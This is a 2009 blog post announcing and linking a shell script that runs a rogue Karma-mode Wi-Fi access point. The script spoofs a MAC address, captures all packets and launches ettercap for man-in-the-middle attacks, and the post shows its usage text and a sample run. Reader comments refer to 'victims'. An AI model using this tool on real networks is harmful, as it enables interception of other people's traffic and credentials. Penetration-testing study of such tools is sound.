Top
Navigation
« Meterpreter Script for Basic Network Enumeration in Target's Netwrok | Main | Winenum Update »
Friday
Jan022009

Script for generating Fake AP with Kama Functionality for MITM Attacks

DateFriday, January 2, 2009 at 1:13AM

the Script will launch depending on the options a valid routed AP in karma mode, it will capture all packets and will launch ettercap. You can choose if you use Airbase-ng or the Madwifi drivers with Digininja's Karma Patch and HD's additions, this is the default madwifi drivers in Backtrack3. Aircrack-ng must be upgraded to the latest development version for the script to work with the Airbase-ng functionality. I hope you guys like it.

http://www.darkoperator.com/mitmap.tar.gz


bt ~ # ./mitmap.sh
Scritp for launching Fake AP to perform Man in The Middle Attack
By Carlos_Perez[at]darkoperator.com
Ver 0.1.1
Usage:
./mitmap.sh -m mode -i wireless interface -o internet interface 
Modes:
ap              :Access Point using Airbase-ng
apf             :Access Point using Airbase-ng and MAC Filtering
apa             :Access Point using Digininja patched Madwifi kernel modules
apaf            :Access Point using Digininja patched Madwifi Kernel modules and MAC filtering
Options:
-s ssid       :SSID to use for the Fake AP
-f text file  :text file containing MAC addresses to use as filter one per line
-d dhcpd conf :Dhcpd configuration file
-h              : This help message
bt ~ # ./mitmap.sh -m ap -s Danger -d ./dhcpd.conf -i ath0 -o eth0
Changing MAC Address
Current MAC: 00:40:96:af:47:65 [wireless] (Cisco        AIR-PC4800, 350, AIR-PCM340, AIR-PCM352)
Faked MAC:   00:01:1e:b7:a7:1f (Precidia Technologies, Inc.)
starting fake ap
This will take 15 seconds ..............
Changing MTU Size for At0 to 1400
DHCPD started succesfully
Starting Packet capture to /root/apmitm-Jan-02-09-010919.cap
ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA
Listening on at0... (Ethernet)
  at0 ->       00:01:1E:B7:A7:1F          10.0.0.1     255.255.255.0
Privileges dropped to UID 0 GID 0...
 28 plugins
 39 protocol dissectors
 53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services
Starting Unified sniffing...
Text only Interface activated...
Hit 'h' for inline help

AuthorCarlos Perez | Comment6 Comments | Print ArticlePrint Article
tagged , , ,

Reader Comments (6)

There is a typo in the banner "Scritp". ;)

February 5, 2009 | Unregistered CommenterSTRSHR

I'm troubled because the connections of the victim fall after a while. can you help me. Thanks

July 20, 2009 | Unregistered Commenterflcarbone
I guess scritp was changed to script but KARMA is still KAMA ;)

But a wonderful script. Skiddies like me are loving it. :)
August 25, 2009 | Unregistered CommenterNishant Das Patnaik
DOOD PLEASE RE-UPLOAD THIS ONE...
I NEED THIS REALLY BAD YOU KNOW :)
February 19, 2010 | Unregistered CommenterGod Bless You
This is really cool script bro. its really nice plus i like the speed and simplicity. I hae just one question though. does this work only on a LAN or can it work remotely??
June 28, 2011 | Unregistered CommenterZuo Bruno
It is designed and done for wireless only
July 4, 2011 | Registered CommenterCarlos Perez

PostPost a New Comment

Enter your information below to add a new comment.
Author Email (optional):
Author URL (optional):
Post:
 
All HTML will be escaped. Hyperlinks will be created for URLs automatically.
Alert
Comment Moderation Enabled
Your comment will not appear until it has been cleared by a website editor.

Notify me of follow-up comments via email.